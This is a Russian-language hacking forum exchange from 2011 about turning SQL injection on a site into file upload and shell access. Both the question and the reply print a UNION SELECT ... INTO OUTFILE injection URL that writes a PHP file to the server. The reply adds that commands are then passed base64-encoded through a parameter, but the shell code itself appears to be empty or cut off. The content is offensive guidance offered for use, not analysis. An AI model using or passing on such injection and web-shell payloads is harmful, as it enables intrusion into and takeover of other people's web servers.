
14.11.2011, 18:06
|
|
Участник форума
Регистрация: 02.07.2010
Сообщений: 140
С нами:
8348726
Репутация:
0
|
|
Сообщение от nikitos2401
Ребят подскажите что делать вот например есть сайт доступ в базу есть хочу залить на сайт через это) и тут возникли 2 вопроса
1) как узнать есть ли у пользователя доступ на запись?
2) если узнаю пути как далее действовать?
это?
Код:
http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php
и как потом залить фаил на шелл если все получится?
Код:
http://site.ru/cat.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php
Лучше так.
И в 1.php?e=(строка зашифрованая в бэйс64)
А код
типа
|
|
|